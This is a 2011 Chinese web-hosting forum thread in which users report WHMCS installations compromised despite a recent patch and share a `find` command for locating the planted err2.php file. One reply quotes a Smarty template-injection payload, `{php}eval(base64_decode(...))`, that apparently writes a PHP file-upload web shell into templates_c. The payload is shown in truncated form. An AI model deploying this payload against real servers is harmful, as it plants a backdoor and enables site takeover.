全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 6507|回复: 20
打印 上一主题 下一主题

悲催,前几天的WHMCS补丁,俺打了,然后入侵了

[复制链接]
跳转到指定楼层
1#
发表于 2011-12-4 16:44:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前几天的WHMCS补丁,俺打了,然后被入侵了

各位找下有没有err2.php文件吧,还好Linode提醒,不然又有得玩的了

  1. find /home/ -name err2.php
复制代码

评分

参与人数 1威望 +18 收起 理由
javaluo + 18 恶意灌水

查看全部评分

2#
发表于 2011-12-4 16:45:40 | 只看该作者
这个文件在whmcs哪个目录下?



是打补丁打晚了还是打了也被入侵了?

评分

参与人数 1威望 +18 收起 理由
javaluo + 18 恶意灌水

查看全部评分

3#
发表于 2011-12-4 16:46:15 | 只看该作者

评分

参与人数 1威望 +18 收起 理由
javaluo + 18 恶意灌水

查看全部评分

4#
 楼主| 发表于 2011-12-4 16:47:20 | 只看该作者
我这边发现有两个,一个在attachments,一个在images下

然后再找下一个mass.txt的文件
5#
发表于 2011-12-4 16:47:22 | 只看该作者
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgk省略几个字母'));{/php}
6#
 楼主| 发表于 2011-12-4 16:48:14 | 只看该作者
0
7#
发表于 2011-12-4 16:49:35 | 只看该作者
杯具。。
8#
发表于 2011-12-4 16:51:33 | 只看该作者
无限悲催
9#
 楼主| 发表于 2011-12-4 16:52:55 | 只看该作者
是刚入侵的(12.4),补丁是12.2的,暂时还不懂怎么入侵法
10#
发表于 2011-12-4 16:54:24 | 只看该作者
又有洞洞了啊?
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-5-10 03:52 , Processed in 0.073694 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表